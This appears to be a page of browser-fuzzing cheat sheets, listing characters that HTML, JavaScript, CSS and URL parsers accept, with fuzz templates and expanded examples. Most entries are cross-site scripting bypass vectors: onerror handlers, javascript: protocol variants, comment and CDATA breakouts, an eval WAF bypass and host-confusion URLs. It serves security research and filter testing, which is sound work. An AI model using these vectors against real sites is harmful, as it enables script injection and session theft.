Cheat sheets
Find WAF bypass for eval context
try { v = "javascript:(1)"; if (eval(v)) { console.log(v); log('$[i]') } } catch(e) { v = '' }
How do you use it?
Non-standard characters that break JSON.parse()
NUL SOH STX ETX EOT ENQ ACK BEL BS VT FF SO SI DLE DC1 DC2 DC3 DC4 NAK SYNC ETB CAN EM SUB ESC FS GS RS US
try {
standard_chars = [
`"`, `'`, `,`, `\n`, `\t`, `\r`, `}`, `{`, `\\`
];
if (!standard_chars.includes(String.fromCodePoint($[i]))) {
JSON.parse(`{"test":" [1]"}`);
}
} catch {
log($[i]);
}
How do you use it?
[1]
try {
standard_chars = [
`"`, `'`, `,`, `\n`, `\t`, `\r`, `}`, `{`, `\\`
];
if (!standard_chars.includes(String.fromCodePoint($[i]))) {
JSON.parse(`{"test":"NUL"}`);
}
} catch {
log($[i]);
}
try { standard_chars = [ `"`, `'`, `,`, `\n`, `\t`, `\r`, `}`, `{`, `\\` ]; if (!standard_chars.includes(String.fromCodePoint($[i]))) { JSON.parse(`{"test":"SOH"}`); } } catch { log($[i]); }
try { standard_chars = [ `"`, `'`, `,`, `\n`, `\t`, `\r`, `}`, `{`, `\\` ]; if (!standard_chars.includes(String.fromCodePoint($[i]))) { JSON.parse(`{"test":"STX"}`); } } catch { log($[i]); }
try { standard_chars = [ `"`, `'`, `,`, `\n`, `\t`, `\r`, `}`, `{`, `\\` ]; if (!standard_chars.includes(String.fromCodePoint($[i]))) { JSON.parse(`{"test":"ETX"}`); } } catch { log($[i]); }
try { standard_chars = [ `"`, `'`, `,`, `\n`, `\t`, `\r`, `}`, `{`, `\\` ]; if (!standard_chars.includes(String.fromCodePoint($[i]))) { JSON.parse(`{"test":"EOT"}`); } } catch { log($[i]); }
Characters that can be between < and script>
<
< [1]script><notfound></script>
How do you use it?
[1]
<<script><notfound></script>Characters that cause the backslash to be consumed with a big5 charset
\
<script>" [1]\"-log($[i])//"</script>
How do you use it?
[1]
<script>"\\"-log($[i])//"</script>Characters that can precede the javascript protocol
SOH STX ETX EOT ENQ ACK BEL BS HT LF VT FF CR SO SI DLE DC1 DC2 DC3 DC4 NAK SYNC ETB CAN EM SUB ESC FS GS RS US SPACE
<a href=" [1]javascript:test.com/" id="test"></a>
How do you use it?
[1]
<a href="SOHjavascript:test.com/" id="test"></a><a href="STXjavascript:test.com/" id="test"></a>
<a href="ETXjavascript:test.com/" id="test"></a>
<a href="EOTjavascript:test.com/" id="test"></a>
<a href="ENQjavascript:test.com/" id="test"></a>
Characters that close or encapsulate HTML attribute values
HT LF FF CR SPACE " '
<img src= [1]xonerror=log($[i])>
How do you use it?
[1]
<img src=HTxonerror=log($[i])><img src=LFxonerror=log($[i])>
<img src=FFxonerror=log($[i])>
<img src=CRxonerror=log($[i])>
<img src=SPACExonerror=log($[i])>
< removal bypass
<
<p> [1]found></p>
How do you use it?
[1]
<p><found></p>Characters in-between square brackets that close cdata
]
<svg><style>
x = "<![CDATA[</style><img title="] [1]]></style></svg><img src onerror=log($[i])>">
How do you use it?
[1]
<svg><style>
x = "<![CDATA[</style><img title="]]]></style></svg><img src onerror=log($[i])>">Includes Validation Chars Allowed
\
if (['https:'].includes(" [1]https:")){
log($[i])
}
How do you use it?
[1]
if (['https:'].includes("\https:")){
log($[i])
}work
>
<img src= [1]{"[alert]"}<found>
How do you use it?
[1]
<img src=>{"[alert]"}<found>HTML vector
>
<image/src/onerror= [1]$[data1]$[data2]<found>
How do you use it?
[1]
<image/src/onerror=>$[data1]$[data2]<found>Chars allowed before domain
<a href="https://.example.com/" id="test$[i]"></a>
How do you use it?
Characters allowed in colon entity
<a href="javascript:abcd" id="x">f</a>
How do you use it?
Characters allowed between multiple HTML attributes
HT LF FF CR SPACE
<img [1]src=xonerror=log($[i])>
How do you use it?
[1]
<imgHTsrc=xonerror=log($[i])><imgLFsrc=xonerror=log($[i])>
<imgFFsrc=xonerror=log($[i])>
<imgCRsrc=xonerror=log($[i])>
<imgSPACEsrc=xonerror=log($[i])>
Bypass __proto__ string match defense
s = "$[i]";
if (typeof s["__proto__"] != "undefined") {
log(fromCodePoint($[i]));
}
How do you use it?
Characters allowed in path traversal
HT # / ? \
new URL("https://x.se/long/.. [1]/a").pathname.length > 4 ? false : log($[i])
How do you use it?
[1]
new URL("https://x.se/long/..HT/a").pathname.length > 4 ? false : log($[i])new URL("https://x.se/long/..#/a").pathname.length > 4 ? false : log($[i])
new URL("https://x.se/long/..//a").pathname.length > 4 ? false : log($[i])
new URL("https://x.se/long/..?/a").pathname.length > 4 ? false : log($[i])
new URL("https://x.se/long/..\/a").pathname.length > 4 ? false : log($[i])
Characters allowed before event in attribute name using setAttribute
\
let img = document.createElement('img');
img.src = 'data:';
img.setAttribute(' [1]onerror','log($[i])')
document.body.append(img);
How do you use it?
[1]
let img = document.createElement('img');
img.src = 'data:';
img.setAttribute('\onerror','log($[i])')
document.body.append(img);Characters that can work as attribute seperator
HT LF FF CR SPACE /
var markup = `<a [1]id=xss>shirley</a>`
var dom = new DOMParser().parseFromString(markup,'text/html')
if(dom.getElementById('xss')){
log($[i])
}
How do you use it?
[1]
var markup = `<aHTid=xss>shirley</a>`
var dom = new DOMParser().parseFromString(markup,'text/html')
if(dom.getElementById('xss')){
log($[i])
}
var markup = `<aLFid=xss>shirley</a>` var dom = new DOMParser().parseFromString(markup,'text/html') if(dom.getElementById('xss')){ log($[i]) }
var markup = `<aFFid=xss>shirley</a>` var dom = new DOMParser().parseFromString(markup,'text/html') if(dom.getElementById('xss')){ log($[i]) }
var markup = `<aCRid=xss>shirley</a>` var dom = new DOMParser().parseFromString(markup,'text/html') if(dom.getElementById('xss')){ log($[i]) }
var markup = `<aSPACEid=xss>shirley</a>` var dom = new DOMParser().parseFromString(markup,'text/html') if(dom.getElementById('xss')){ log($[i]) }
Characters that can start an HTML comment
! / ?
< [1] <a/b="--><found>"
How do you use it?
[1]
<! <a/b="--><found>"</ <a/b="--><found>"
<? <a/b="--><found>"
Fuzzing weird script behaviour after script text
/ HT CR FF LF SPACE >
<script>
x = "<!--<script [1]>"
</script>
<div title="</script><img src=data: onerror=log($[i])>"></div>
How do you use it?
[1]
<script>
x = "<!--<script/>"
</script>
<div title="</script><img src=data: onerror=log($[i])>"></div><script> x = "<!--<scriptHT>" </script> <div title="</script><img src=data: onerror=log($[i])>"></div>
<script> x = "<!--<scriptCR>" </script> <div title="</script><img src=data: onerror=log($[i])>"></div>
<script> x = "<!--<scriptFF>" </script> <div title="</script><img src=data: onerror=log($[i])>"></div>
<script> x = "<!--<scriptLF>" </script> <div title="</script><img src=data: onerror=log($[i])>"></div>
Characters allowed to end a JS string
"
var myVar = "foo [1]
log($[i])
// a";
How do you use it?
[1]
var myVar = "foo"
log($[i])
// a";
JavaScript Scheme starting with http
log(new URL("httpjavascript:alert()").protocol)
How do you use it?
Characters allowed before CSS selectors
HT LF FF CR SPACE
<style>
[1]div{color:red;}
</style>
<div id=x>test</div>
How do you use it?
[1]
<style>
HTdiv{color:red;}
</style>
<div id=x>test</div>
<style> LFdiv{color:red;} </style> <div id=x>test</div>
<style> FFdiv{color:red;} </style> <div id=x>test</div>
<style> CRdiv{color:red;} </style> <div id=x>test</div>
<style> SPACEdiv{color:red;} </style> <div id=x>test</div>
Host
if (new URL('https://www.example.com/evil.com').host=='evil.com') {
log('"https://www.example.com/evil.com" -> "evil.com"')
}
if (new URL('https://www.example.comevil.com').host=='evil.com') {
log('"https://www.example.comevil.com" -> "evil.com"')
}
How do you use it?
ToUpperCase Improper Character Morphing
var targets=['"','\'','<','/','>','\\']
if (targets.includes(''.toUpperCase())) {
log($[i]+' (normal) ( -> '+"".toUpperCase()+')')
}
if (targets.includes(''.toLocaleUpperCase())) {
log($[i]+' (locale) ( -> '+"".toLocaleUpperCase()+')')
}
How do you use it?
Characters that can break out of an inline style background-image url
<div id="test" style="background-image: url(;width:100%">hello</div>
How do you use it?
Characters that can break out of an inline style with single quotes
<div id="test" style='onload="alert(1)">hello</div>
How do you use it?
Characters that can break out of an inline style with double quotes
<div id="test" style="onload="alert(1)">hello</div>
How do you use it?
HTML-Encoded Attribute Escape
<img src="/image.png" tag="html()><iframe><!--">
How do you use it?
Quotes
<img src="<iframe><!--">
How do you use it?
Characters allowed after malformed entities
- LF \u2009 \u2000 \u2003 \u2007 HT \u2008 \u2004 SPACE VT \u1680 \u2006 & \u202f \xa0 \u200a \ufeff ~ FF \u2005 ! ; CR \u3000 \u2001 \u2002 \u2028 + \u205f \u2029
<img src=data: onerror="1& [1]log($[i])">
How do you use it?
[1]
<img src=data: onerror="1&-log($[i])"><img src=data: onerror="1&LFlog($[i])">
<img src=data: onerror="1&\u2009log($[i])">
<img src=data: onerror="1&\u2000log($[i])">
<img src=data: onerror="1&\u2003log($[i])">
Characters allowed to break double quotes
<form id="test" action="aaaonsubmit=alert(1)><input/type='submit'>
How do you use it?
JavaScript Scheme starting with https://
if (new URL("https://javascript:alert()").protocol=="javascript:"){log($[i])}
How do you use it?
Characters allowed after greater than in events
\ufeff \u2028 > ~ \u3000 \u2003 \u2000 \u2004 \u2006 ! \u2029 - \xa0 \u2005 \u2008 + \u200a SPACE \u1680 \u2002 \u2007 \u2009 LF \u205f ; \u202f HT FF VT CR \u2001
<img src=data: onerror="1> [1] log($[i])">
How do you use it?
[1]
<img src=data: onerror="1>\ufeff log($[i])"><img src=data: onerror="1>\u2028 log($[i])">
<img src=data: onerror="1>> log($[i])">
<img src=data: onerror="1>~ log($[i])">
<img src=data: onerror="1>\u3000 log($[i])">
Characters that act as new lines in multi line strings
LF CR \u2028 \u2029
"x\ [1]"==="x" && log($[i])
How do you use it?
[1]
"x\LF"==="x" && log($[i])"x\CR"==="x" && log($[i])
"x\\u2028"==="x" && log($[i])
"x\\u2029"==="x" && log($[i])
characters allowed between exclamation mark and greater then
>
<!----! [1]><found>
How do you use it?
[1]
<!----!>><found>Characters ignored after backslash with multiline string
CR
({"x\ [1]
":1337}.x)==1337&&log($[i])
How do you use it?
[1]
({"x\CR
":1337}.x)==1337&&log($[i])Characters ignored in strings when doing a non strict comparison
HT VT FF SPACE + 0 \xa0 \u1680 \u2000 \u2001 \u2002 \u2003 \u2004 \u2005 \u2006 \u2007 \u2008 \u2009 \u200a \u2028 \u2029 \u202f \u205f \u3000 \ufeff
" [1]1337"==1337&&log($[i])
How do you use it?
[1]
"HT1337"==1337&&log($[i])"VT1337"==1337&&log($[i])
"FF1337"==1337&&log($[i])
"SPACE1337"==1337&&log($[i])
"+1337"==1337&&log($[i])
Characters that act as attribute quotes
" '
<div a= [1]><!-- ></div><img src=x:x onerror=log($[i]) -->
How do you use it?
[1]
<div a="><!-- ></div><img src=x:x onerror=log($[i]) --><div a='><!-- ></div><img src=x:x onerror=log($[i]) -->
Characters ignored in an attribute name
HT LF FF CR SPACE / >
<div [1]="><img src=x:x onerror=log($[i])>"></div>
How do you use it?
[1]
<div HT="><img src=x:x onerror=log($[i])>"></div><div LF="><img src=x:x onerror=log($[i])>"></div>
<div FF="><img src=x:x onerror=log($[i])>"></div>
<div CR="><img src=x:x onerror=log($[i])>"></div>
<div SPACE="><img src=x:x onerror=log($[i])>"></div>
Characters that can be used in eval to write code in between
HT VT FF SPACE ; \xa0 \u1680 \u2000 \u2001 \u2002 \u2003 \u2004 \u2005 \u2006 \u2007 \u2008 \u2009 \u200a \u2028 \u2029 \u202f \u205f \u3000 \ufeff
eval(' [1]log($[i])')
How do you use it?
[1]
eval('HTlog($[i])')eval('VTlog($[i])')
eval('FFlog($[i])')
eval('SPACElog($[i])')
eval(';log($[i])')
Characters to break out from eval string
"
eval('" [1]');log($[i]);
How do you use it?
[1]
eval('""');log($[i]);Valid characters between function and dot-parenthesis .()
?
prompt [1].();log($[i])
How do you use it?
[1]
prompt?.();log($[i])Valid characters between function and parenthesis
HT LF VT FF CR SPACE \xa0 \u1680 \u2000 \u2001 \u2002 \u2003 \u2004 \u2005 \u2006 \u2007 \u2008 \u2009 \u200a \u2028 \u2029 \u202f \u205f \u3000 \ufeff
alert [1]();log($[i])
How do you use it?
[1]
alertHT();log($[i])alertLF();log($[i])
alertVT();log($[i])
alertFF();log($[i])
alertCR();log($[i])
Characters allowed between < and element
<h1>sample</h1>
How do you use it?
Attribute separators
<imgonerror=alert() src=x />
How do you use it?
Characters allowed before optional chaining
HT LF VT FF CR SPACE \xa0 \u1680 \u2000 \u2001 \u2002 \u2003 \u2004 \u2005 \u2006 \u2007 \u2008 \u2009 \u200a \u2028 \u2029 \u202f \u205f \u3000 \ufeff
HT LF VT FF CR SPACE \xa0 \u1680 \u2000 \u2001 \u2002 \u2003 \u2004 \u2005 \u2006 \u2007 \u2008 \u2009 \u200a \u2028 \u2029 \u202f \u205f \u3000 \ufeff
log [1]?. [2]($[i])
How do you use it?
[1]
logHT?. ($[i])logLF?. ($[i])
logVT?. ($[i])
logFF?. ($[i])
logCR?. ($[i])
[2]
log ?.HT($[i])log ?.LF($[i])
log ?.VT($[i])
log ?.FF($[i])
log ?.CR($[i])
Characters allowed before the tag attribute and equals.
HT LF FF CR SPACE
<div style [1]="color:red;">test</div>
How do you use it?
[1]
<div styleHT="color:red;">test</div><div styleLF="color:red;">test</div>
<div styleFF="color:red;">test</div>
<div styleCR="color:red;">test</div>
<div styleSPACE="color:red;">test</div>
Characters allowed after the void operator
HT LF VT FF CR SPACE ! + - ~ \xa0 \u1680 \u2000 \u2001 \u2002 \u2003 \u2004 \u2005 \u2006 \u2007 \u2008 \u2009 \u200a \u2028 \u2029 \u202f \u205f \u3000 \ufeff
void [1]log($[i])
How do you use it?
[1]
voidHTlog($[i])voidLFlog($[i])
voidVTlog($[i])
voidFFlog($[i])
voidCRlog($[i])
Characters that can be used as valid labels in JavaScript
$ _ \xaa \xb5 \xba \u02ec \u02ee \u037f \u0386 \u038c \u0559 \u06d5 \u06ff \u0710 \u07b1 \u07fa \u081a \u0824 \u0828 \u093d \u0950 \u09b2 \u09bd \u09ce \u09fc \u0a5e \u0abd \u0ad0 \u0af9 \u0b3d \u0b71 \u0b83 \u0b9c \u0bd0 \u0c3d \u0c5d \u0c80 \u0cbd \u0d3d \u0d4e \u0dbd \u0e84 \u0ea5 \u0ebd \u0ec6 \u0f00 \u103f \u1061 \u108e \u10c7 \u10cd \u1258 \u12c0 \u17d7 \u17dc \u18aa \u1aa7 \u1cfa \u1f59 \u1f5b \u1f5d \u1fbe \u2071 \u207f \u2102 \u2107 \u2115 \u2124 \u2126 \u2128 \u214e \u2d27 \u2d2d \u2d6f \ua7d3 \ua8fb \ua9cf \uaa7a \uaab1 \uaac0 \uaac2 \ufb1d \ufb3e \u{010808} \u{01083c} \u{010a00} \u{010f27} \u{011075} \u{011144} \u{011147} \u{011176} \u{0111da} \u{0111dc} \u{011288} \u{01133d} \u{011350} \u{0114c7} \u{011644} \u{0116b8} \u{011909} \u{01193f} \u{011941} \u{0119e1} \u{0119e3} \u{011a00} \u{011a3a} \u{011a50} \u{011a9d} \u{011c40} \u{011d46} \u{011d98} \u{011f02} \u{011fb0} \u{016f50} \u{016fe3} \u{01b132} \u{01b155} \u{01d4a2} \u{01d4bb} \u{01d546} \u{01e14e} \u{01e94b} \u{01ee24} \u{01ee27} \u{01ee39} \u{01ee3b} \u{01ee42} \u{01ee47} \u{01ee49} \u{01ee4b} \u{01ee54} \u{01ee57} \u{01ee59} \u{01ee5b} \u{01ee5d} \u{01ee5f} \u{01ee64} \u{01ee7e}
[1]:log($[i])
How do you use it?
[1]
$:log($[i])_:log($[i])
\xaa:log($[i])
\xb5:log($[i])
\xba:log($[i])
Characters that are valid JS variables
$ _ \xaa \xb5 \xba \u02ec \u02ee \u037f \u0386 \u038c \u0559 \u06d5 \u06ff \u0710 \u07b1 \u07fa \u081a \u0824 \u0828 \u093d \u0950 \u09b2 \u09bd \u09ce \u09fc \u0a5e \u0abd \u0ad0 \u0af9 \u0b3d \u0b71 \u0b83 \u0b9c \u0bd0 \u0c3d \u0c5d \u0c80 \u0cbd \u0d3d \u0d4e \u0dbd \u0e84 \u0ea5 \u0ebd \u0ec6 \u0f00 \u103f \u1061 \u108e \u10c7 \u10cd \u1258 \u12c0 \u17d7 \u17dc \u18aa \u1aa7 \u1cfa \u1f59 \u1f5b \u1f5d \u1fbe \u2071 \u207f \u2102 \u2107 \u2115 \u2124 \u2126 \u2128 \u214e \u2d27 \u2d2d \u2d6f \ua7d3 \ua8fb \ua9cf \uaa7a \uaab1 \uaac0 \uaac2 \ufb1d \ufb3e \u{010808} \u{01083c} \u{010a00} \u{010f27} \u{011075} \u{011144} \u{011147} \u{011176} \u{0111da} \u{0111dc} \u{011288} \u{01133d} \u{011350} \u{0114c7} \u{011644} \u{0116b8} \u{011909} \u{01193f} \u{011941} \u{0119e1} \u{0119e3} \u{011a00} \u{011a3a} \u{011a50} \u{011a9d} \u{011c40} \u{011d46} \u{011d98} \u{011f02} \u{011fb0} \u{016f50} \u{016fe3} \u{01b132} \u{01b155} \u{01d4a2} \u{01d4bb} \u{01d546} \u{01e14e} \u{01e94b} \u{01ee24} \u{01ee27} \u{01ee39} \u{01ee3b} \u{01ee42} \u{01ee47} \u{01ee49} \u{01ee4b} \u{01ee54} \u{01ee57} \u{01ee59} \u{01ee5b} \u{01ee5d} \u{01ee5f} \u{01ee64} \u{01ee7e}
var [1]=log($[i])
How do you use it?
[1]
var $=log($[i])var _=log($[i])
var \xaa=log($[i])
var \xb5=log($[i])
var \xba=log($[i])
Characters allowed instead of equal sign
=
<img src onerror [1]log($[i])>
How do you use it?
[1]
<img src onerror=log($[i])>Characters between < and element name
<
HT LF FF CR SPACE / >
< [1]found [2]>
How do you use it?
[1]
<<found >[2]
<foundHT><foundLF>
<foundFF>
<foundCR>
<foundSPACE>
Characters allowed between an object and bracket notation
HT LF VT FF CR SPACE % & * + , - / : ; < = > ^ | \xa0 \u1680 \u2000 \u2001 \u2002 \u2003 \u2004 \u2005 \u2006 \u2007 \u2008 \u2009 \u200a \u2028 \u2029 \u202f \u205f \u3000 \ufeff
document [1]['location'];log($[i])
How do you use it?
[1]
documentHT['location'];log($[i])documentLF['location'];log($[i])
documentVT['location'];log($[i])
documentFF['location'];log($[i])
documentCR['location'];log($[i])
Characters allowed between an object and the dot operator
HT LF VT FF CR SPACE ? \xa0 \u1680 \u2000 \u2001 \u2002 \u2003 \u2004 \u2005 \u2006 \u2007 \u2008 \u2009 \u200a \u2028 \u2029 \u202f \u205f \u3000 \ufeff
window [1].alert();log($[i])
How do you use it?
[1]
windowHT.alert();log($[i])windowLF.alert();log($[i])
windowVT.alert();log($[i])
windowFF.alert();log($[i])
windowCR.alert();log($[i])
Characters that can be inserted in the middle of the JS protocol name
HT LF CR
<a id="0" href="j [1]avascript:window">craft-me</a>
How do you use it?
[1]
<a id="0" href="jHTavascript:window">craft-me</a><a id="0" href="jLFavascript:window">craft-me</a>
<a id="0" href="jCRavascript:window">craft-me</a>
Characters allowed in-between operators
HT LF VT FF CR SPACE \xa0 \u1680 \u2000 \u2001 \u2002 \u2003 \u2004 \u2005 \u2006 \u2007 \u2008 \u2009 \u200a \u2028 \u2029 \u202f \u205f \u3000 \ufeff
"1337" [1]inlog($[i])
How do you use it?
[1]
"1337"HTinlog($[i])"1337"LFinlog($[i])
"1337"VTinlog($[i])
"1337"FFinlog($[i])
"1337"CRinlog($[i])
Characters allowed in-between hyphens
-
<!- [1]- ><xmp>--><img src/onerror=log($[i])>-->
How do you use it?
[1]
<!--- ><xmp>--><img src/onerror=log($[i])>-->Characters allowed as a class separator
HT LF FF CR SPACE
<div class=" [1]x"></div>
How do you use it?
[1]
<div class="HTx"></div><div class="LFx"></div>
<div class="FFx"></div>
<div class="CRx"></div>
<div class="SPACEx"></div>
Characters that act like new line or single line comment
LF CR & * / ; < = > ? | \u2028 \u2029
log($[i]) [1]sdfasdfasfasfd
How do you use it?
[1]
log($[i])LFsdfasdfasfasfdlog($[i])CRsdfasdfasfasfd
log($[i])&sdfasdfasfasfd
log($[i])*sdfasdfasfasfd
log($[i])/sdfasdfasfasfd
Characters that act as quotes or whitespace
HT LF FF CR SPACE " ' ;
<div style= [1]color:red></div>
How do you use it?
[1]
<div style=HTcolor:red></div><div style=LFcolor:red></div>
<div style=FFcolor:red></div>
<div style=CRcolor:red></div>
<div style=SPACEcolor:red></div>
Characters allowed between HTML attributes
HT LF FF CR SPACE /
<img [1]srconerror=log($[i])>
How do you use it?
[1]
<imgHTsrconerror=log($[i])><imgLFsrconerror=log($[i])>
<imgFFsrconerror=log($[i])>
<imgCRsrconerror=log($[i])>
<imgSPACEsrconerror=log($[i])>
Valid characters before domain 1
HT LF CR / @ \ \xad \u034f \u180b \u180c \u180d \u180f \u200b \u2060 \u2064 \ufe00 \ufe01 \ufe02 \ufe03 \ufe04 \ufe05 \ufe06 \ufe07 \ufe08 \ufe09 \ufe0a \ufe0b \ufe0c \ufe0d \ufe0e \ufe0f \ufeff
<a href="https:// [1]example.com/" id="test$[i]"></a>
How do you use it?
[1]
<a href="https://HTexample.com/" id="test$[i]"></a><a href="https://LFexample.com/" id="test$[i]"></a>
<a href="https://CRexample.com/" id="test$[i]"></a>
<a href="https:///example.com/" id="test$[i]"></a>
<a href="https://@example.com/" id="test$[i]"></a>
Characters that can break out of a single line comment
LF CR \u2028 \u2029
// [1]log($[i])
How do you use it?
[1]
// LFlog($[i])// CRlog($[i])
// \u2028log($[i])
// \u2029log($[i])
Characters allowed javascript and colon
HT : \
if (new URL("javascript [1]:alert()").protocol=="javascript:"){log($[i])}
How do you use it?
[1]
if (new URL("javascriptHT:alert()").protocol=="javascript:"){log($[i])}if (new URL("javascript::alert()").protocol=="javascript:"){log($[i])}
if (new URL("javascript\:alert()").protocol=="javascript:"){log($[i])}
Characters allowed between variable name and equals sign
HT LF VT FF CR SPACE \xa0 \u1680 \u2000 \u2001 \u2002 \u2003 \u2004 \u2005 \u2006 \u2007 \u2008 \u2009 \u200a \u2028 \u2029 \u202f \u205f \u3000 \ufeff
const x [1]="x"
if(x==="x"){log($[i])}
How do you use it?
[1]
const xHT="x"
if(x==="x"){log($[i])}const xLF="x" if(x==="x"){log($[i])}
const xVT="x" if(x==="x"){log($[i])}
const xFF="x" if(x==="x"){log($[i])}
const xCR="x" if(x==="x"){log($[i])}
Characters allowed between slashes
HT / \
anchor.href='/ [1]/example.com';
if(anchor.host === 'example.com')log($[i])
How do you use it?
[1]
anchor.href='/HT/example.com';
if(anchor.host === 'example.com')log($[i])anchor.href='///example.com'; if(anchor.host === 'example.com')log($[i])
anchor.href='/\/example.com'; if(anchor.host === 'example.com')log($[i])
Break out of CSS strings
LF FF CR '
<div style="font-family:'x [1];color:red;';">test</div>
How do you use it?
[1]
<div style="font-family:'xLF;color:red;';">test</div><div style="font-family:'xFF;color:red;';">test</div>
<div style="font-family:'xCR;color:red;';">test</div>
<div style="font-family:'x';color:red;';">test</div>
characters after slash that make a http protocol
/ \
<a href="/ [1]test.com/" id="test$[i]"></a>
How do you use it?
[1]
<a href="//test.com/" id="test$[i]"></a><a href="/\test.com/" id="test$[i]"></a>
Characters after strings
LF CR % & * + , - / ; < > ^ | \u2028 \u2029
"" [1]log($[i])
How do you use it?
[1]
""LFlog($[i])""CRlog($[i])
""%log($[i])
""&log($[i])
""*log($[i])
Characters allowed between in operator
HT LF VT FF CR SPACE \xa0 \u1680 \u2000 \u2001 \u2002 \u2003 \u2004 \u2005 \u2006 \u2007 \u2008 \u2009 \u200a \u2028 \u2029 \u202f \u205f \u3000 \ufeff
1337 [1]inlog($[i])
How do you use it?
[1]
1337HTinlog($[i])1337LFinlog($[i])
1337VTinlog($[i])
1337FFinlog($[i])
1337CRinlog($[i])
Characters that separate CSS properties
;
<div style="font-family:'blah' [1]color:red"></div>
How do you use it?
[1]
<div style="font-family:'blah';color:red"></div>Character that closes HTML tag
>
<img src=x [1]<found>
How do you use it?
[1]
<img src=x><found>JavaScript separators between function names
LF CR % & * + , - / ; < > ^ | \u2028 \u2029
console.log() [1]log($[i])
How do you use it?
[1]
console.log()LFlog($[i])console.log()CRlog($[i])
console.log()%log($[i])
console.log()&log($[i])
console.log()*log($[i])
Character allowed after onerror event
HT LF FF CR SPACE
<img src=x onerror [1]=log($[i])>
How do you use it?
[1]
<img src=x onerrorHT=log($[i])><img src=x onerrorLF=log($[i])>
<img src=x onerrorFF=log($[i])>
<img src=x onerrorCR=log($[i])>
<img src=x onerrorSPACE=log($[i])>
Characters allowed before parentheses
HT LF VT FF CR SPACE \xa0 \u1680 \u2000 \u2001 \u2002 \u2003 \u2004 \u2005 \u2006 \u2007 \u2008 \u2009 \u200a \u2028 \u2029 \u202f \u205f \u3000 \ufeff
HT LF VT FF CR SPACE ; \xa0 \u1680 \u2000 \u2001 \u2002 \u2003 \u2004 \u2005 \u2006 \u2007 \u2008 \u2009 \u200a \u2028 \u2029 \u202f \u205f \u3000 \ufeff
log [1]($[i]) [2]
How do you use it?
[1]
logHT($[i]) logLF($[i])
logVT($[i])
logFF($[i])
logCR($[i])
[2]
log ($[i])HTlog ($[i])LF
log ($[i])VT
log ($[i])FF
log ($[i])CR
Characters allowed after * in CSS comments
/
<div style="/** [1]color:red;">test</div>
How do you use it?
[1]
<div style="/**/color:red;">test</div>Characters allowed before onerror events
HT LF FF CR SPACE /
<img src [1]onerror=log($[i])>
How do you use it?
[1]
<img src HTonerror=log($[i])><img src LFonerror=log($[i])>
<img src FFonerror=log($[i])>
<img src CRonerror=log($[i])>
<img src SPACEonerror=log($[i])>
HTML comment before greater than
! - >
<!---- [1]><found>
How do you use it?
[1]
<!----!><found><!-----><found>
<!---->><found>